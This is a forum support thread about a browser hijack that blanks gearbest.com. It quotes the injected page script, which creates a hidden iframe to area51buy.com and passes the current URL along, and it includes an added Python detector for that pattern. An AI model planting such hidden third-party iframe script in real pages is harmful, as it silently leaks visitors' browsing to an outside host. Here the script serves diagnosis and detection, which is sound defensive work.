AdwCleaner was unable to fix it. MalwareBytes also did not help. When I try to open gearbest.com in Firefox I see a blank page. The source of the page:

 

<!DOCTYPE html>
<html>
<body>
	<script type="text/javascript">
	var url=location.href;
	var ifr = document.createElement('iframe'); 
    ifr.style.display = 'none'; 
    ifr.src ='//area51buy.com/'+'#'+url;
    document.body.appendChild(ifr); 
	</script>
</body>
</html>
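
A static check for the pattern in the page source above (an iframe built by inline script, hidden, pointed at another host, with the current URL appended), as an added example that is not part of the original post. The function and field names are hypothetical, the regexes are heuristics, and the sample input is the quoted script embedded inline.

```python
import re
from html.parser import HTMLParser

# Sample input: the script quoted in the post above, embedded so this runs offline.
SAMPLE = """<!DOCTYPE html><html><body>
<script type="text/javascript">
var url=location.href;
var ifr = document.createElement('iframe');
ifr.style.display = 'none';
ifr.src ='//area51buy.com/'+'#'+url;
document.body.appendChild(ifr);
</script>
</body></html>"""

class InlineScripts(HTMLParser):
    """Collect the bodies of inline <script> elements."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

NEW_IFRAME = re.compile(r"(\w+)\s*=\s*document\.createElement\(\s*['\"]iframe['\"]\s*\)")
URL_VAR = re.compile(r"(\w+)\s*=\s*(?:window\.|document\.)?location(?:\.href)?\s*;")
HOST = re.compile(r"['\"](?:https?:)?//([^/'\"]+)")

def find_script_iframes(html, expected_host):
    """Report script-built iframes: target host, third party?, hidden?, URL passed on?"""
    page = InlineScripts()
    page.feed(html)
    page.close()
    findings = []
    for js in page.scripts:
        url_vars = set(URL_VAR.findall(js)) | {"location"}  # names holding the page URL
        for m in NEW_IFRAME.finditer(js):
            var = r"\b" + re.escape(m.group(1))
            src = re.search(var + r"\.src\s*=\s*([^;\n]+)", js)
            host = HOST.search(src.group(1)) if src else None
            if not host:
                continue
            name = host.group(1).lower()
            findings.append({"host": name,
                "third_party": name != expected_host and not name.endswith("." + expected_host),
                "hidden": bool(re.search(var + r"\.style\.display\s*=\s*['\"]none", js)),
                "leaks_url": any(re.search(r"\b%s\b" % re.escape(v), src.group(1)) for v in url_vars)})
    return findings
```

Calling `find_script_iframes(SAMPLE, "gearbest.com")` returns one finding for `area51buy.com` with all three flags set; run it on source saved from the affected profile and from a clean profile to see which one receives the injected page.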

 

 

Re: area51buy.com hijack

Greetings,

Can you give me the list of your installed addons - in Firefox?

Also, please share the AdwCleaner/Malwarebytes logfiles.

Thanks!

Re: area51buy.com hijack

Thanks for replying. I tested it with all addons disabled and the problem is still there. Both AdwCleaner and MalwareBytes tell me that "no threats were found".

I created a new clean Firefox profile and that problem disappeared, but I would like to be able to remove it from my current profile (to preserve history, open tabs, etc.)

I can send files from my Firefox profile if that helps (I did a full text search on all files in my profile for text string "area51buy.com" but nothing relevant was found)

Re: area51buy.com hijack

Hello,

I can send files from my Firefox profile if that helps (I did a full text search on all files in my profile for text string "area51buy.com" but nothing relevant was found)

Simplex, 2017-11-09 12:10:12 (UTC)

Yes, please do. I'm sure we'll find a solution.

Also,

Can you give me the list of your installed addons - in Firefox?

Also, please share the AdwCleaner/Malwarebytes logfiles.


cocochepeau, 2017-11-09 09:28:05 (UTC)

Thanks.

Re: area51buy.com hijack

Thanks! What files from the Firefox profile should I upload? Logs:

MalwareBytes: https://pastebin.com/8Cr1dNMP

AdwCleaner: https://pastebin.com/NatkW1J6

Addons: https://pastebin.com/4ZgCDJsT

 

EDIT: I just checked gearbest.com and now the page loads. I don't know what happened, but it's fixed.

Re: area51buy.com hijack

Hello,

Sorry for the late answer.

Glad to know it's now fixed. Maybe it was only related to gearbest.com, something like a defacement [1]? I can't find anything online about it though.

Feel free to come back if you see anything weird again.

Regards.

[1] https://en.wikipedia.org/wiki/Website_defacement